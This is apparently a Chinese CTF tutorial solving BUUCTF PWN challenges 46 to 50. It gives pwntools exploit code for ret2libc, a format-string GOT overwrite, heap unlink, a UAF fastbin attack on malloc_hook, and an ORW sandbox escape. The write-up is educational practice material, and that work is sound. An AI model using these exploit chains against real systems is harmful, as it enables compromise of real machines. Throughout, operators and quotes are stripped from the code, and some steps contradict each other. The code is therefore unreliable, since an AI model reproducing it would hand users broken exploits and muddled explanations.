1. BUUCTF PWN 46-50 解题思路全解析最近在BUUCTF平台上刷PWN题时发现46-50这五道题对新手来说是个不错的进阶练习。这几题涵盖了ret2libc、shellcode等经典漏洞利用技术正好适合用来巩固基础。今天我就把这几题的详细解题过程整理出来顺便分享一些调试技巧和避坑经验。2. 解题环境准备2.1 基础工具配置工欲善其事必先利其器做PWN题需要准备好以下工具链pwntoolsPython的漏洞利用框架gdb-peda增强版GDB调试工具checksec检查二进制文件保护机制ROPgadget查找ROP链的工具one_gadget查找可直接getshell的gadget建议使用Ubuntu 18.04/20.04系统安装命令如下sudo apt update sudo apt install -y python3 python3-pip git pip3 install pwntools git clone https://github.com/longld/peda.git ~/peda echo source ~/peda/peda.py ~/.gdbinit2.2 题目文件处理从BUUCTF下载题目后先用checksec检查保护机制checksec --filepwn46这会显示NX、Canary、PIE等保护是否开启直接影响我们的利用方式。这几道题的保护机制都比较典型NX开启栈不可执行需要用ROP或ret2libcCanary关闭可以直接栈溢出PIE关闭函数地址固定3. PWN46解题详解3.1 题目分析首先用IDA反编译pwn46发现是个简单的栈溢出漏洞int vuln() { char buf[64]; read(0, buf, 0x100); return 0; }明显的缓冲区溢出buf只有64字节但可以读入0x100字节。3.2 漏洞利用由于NX开启我们需要构造ROP链。步骤如下泄露libc地址通过puts打印GOT表项计算system和/bin/sh地址二次溢出执行system(/bin/sh)关键payload构造from pwn import * context.log_level debug p process(./pwn46) # 第一次溢出泄露地址 payload bA*72 payload p64(pop_rdi) p64(puts_got) payload p64(puts_plt) payload p64(main_addr) p.send(payload) # 接收泄露的地址并计算偏移 leak u64(p.recv(6).ljust(8, b\x00)) libc_base leak - libc.sym[puts] system libc_base libc.sym[system] binsh libc_base next(libc.search(b/bin/sh)) # 第二次溢出getshell payload bA*72 payload p64(ret) # 栈对齐 payload p64(pop_rdi) p64(binsh) payload p64(system) p.send(payload) p.interactive()3.3 调试技巧在构造ROP链时经常会遇到段错误。这时可以用gdb调试gdb -q ./pwn46 b *vuln50 # 在ret指令处下断点 r (python3 exploit.py)观察栈布局和寄存器值确保ROP链正确执行。4. PWN47解题过程4.1 题目特点这题开启了Partial RELRO和NX但没有PIE。反编译后发现有个格式化字符串漏洞printf(buf); // 用户可控的格式化字符串4.2 利用思路格式化字符串漏洞可以泄露栈数据和libc地址任意地址写我们需要通过泄露计算出libc基址然后覆写GOT表中的printf为system最后传入/bin/sh。4.3 关键payload# 泄露libc地址 payload b%15$p p.sendline(payload) leak int(p.recvline(), 16) libc_base leak - 0x20830 # 计算要写入的地址 system libc_base libc.sym[system] printf_got elf.got[printf] # 分步写入system地址 for i in range(3): payload fmtstr_payload(6, {printf_goti: (system(8*i))0xff}) p.sendline(payload) # 触发system(/bin/sh) p.sendline(b/bin/sh\x00) p.interactive()4.4 注意事项格式化字符串偏移需要通过调试确定64位地址需要分多次写入注意地址对齐问题5. PWN48解题记录5.1 题目分析这题是个堆利用题目提供了malloc和free功能但没有限制大小void *ptr malloc(size); // size可控 read(0, ptr, size); // 堆溢出5.2 利用方法典型的堆溢出unlink攻击构造两个相邻的chunk通过溢出修改第二个chunk的size和fd/bk指针触发unlink实现任意地址写5.3 详细步骤# 构造fake chunk malloc(0x80) # chunk1 malloc(0x80) # chunk2 # 构造payload payload p64(0) p64(0x81) # 伪造prev_size和size payload p64(free_got - 0x18) p64(free_got - 0x10) # fd和bk payload bA*(0x80-0x20) payload p64(0x80) p64(0x90) # 修改下一个chunk的prev_size和size # 触发unlink free(2) # 现在free_got被修改为shellcode地址5.4 堆利用技巧使用gef的heap命令查看堆状态注意chunk的size要符合对齐要求unlink时会检查fd-bk p bk-fd p6. PWN49解题分析6.1 题目特点这题是个菜单题提供了add、delete、edit等功能存在UAF漏洞free(ptr); // 没有置NULL edit(ptr); // UAF6.2 利用思路UAF可以结合fastbin attack释放两个chunk到fastbin通过UAF修改fd指针指向伪造的chunkmalloc分配到目标地址6.3 详细利用# 创建两个chunk add(0x60, bAAAA) # chunk0 add(0x60, bBBBB) # chunk1 # 释放并利用UAF free(0) free(1) edit(1, p64(malloc_hook - 0x23)) # 现在可以分配到malloc_hook附近 add(0x60, bCCCC) add(0x60, b\x00*0x13 p64(one_gadget))6.4 注意事项fastbin的size要匹配malloc_hook附近的伪造size要合理one_gadget需要满足特定条件7. PWN50解题过程7.1 题目分析这题是个沙箱逃逸题目禁用了execve但允许open/read/write。我们需要用ORW(Open-Read-Write)的方式读取flag。7.2 利用思路构造ROP链调用open打开flag文件调用read读取文件内容调用write输出到stdout7.3 关键payload# ROP链构造 rop ROP(libc) rop.open(flag_path, 0) rop.read(3, heap_addr, 0x100) rop.write(1, heap_addr, 0x100) # 发送payload payload bA*72 rop.chain() p.send(payload) print(p.recvall())7.4 沙箱绕过技巧使用seccomp-tools检查沙箱规则flag路径通常为./flag或/flag文件描述符3通常是第一个打开的文件8. 常见问题与解决方案8.1 地址泄露失败问题泄露的地址不正确或程序崩溃 解决检查泄露的GOT表项是否正确确保接收数据长度足够可能需要添加ret指令对齐栈8.2 ROP链执行失败问题执行到中间崩溃 解决用gdb单步调试查看崩溃点检查栈对齐情况(特别是ubuntu18以上)确保所有gadget地址正确8.3 one_gadget条件不满足问题one_gadget执行后没getshell 解决尝试不同的one_gadget通过ROP设置寄存器满足约束条件回退到system(/bin/sh)方式9. 调试与优化技巧9.1 gdb增强调试使用pwntools的gdb集成p process(./pwn50) gdb.attach(p, b *vuln30 c )9.2 自动化脚本编写建议使用类封装常用操作class Exploit: def __init__(self, elf, libc): self.elf elf self.libc libc def leak(self, func): payload ... return u64(p.recv(6).ljust(8, b\x00))9.3 性能优化使用cyclic快速定位溢出点预计算常用地址减少交互次数复用连接避免重复启动程序10. 进阶学习建议10.1 推荐学习路线先掌握栈溢出基础学习ret2libc技术理解堆利用原理练习沙箱逃逸10.2 推荐资源《漏洞利用的艺术》(The Art of Exploitation)LiveOverflow YouTube频道CTF Wiki (ctf-wiki.org)10.3 练习平台BUUCTFPwnable.krHack The BoxPwnable.tw这几道题涵盖了PWN中的常见考点建议每道题都手动调试几次理解每个步骤的原理。遇到问题时多查资料PWN的学习曲线比较陡峭但掌握后会有很大成就感。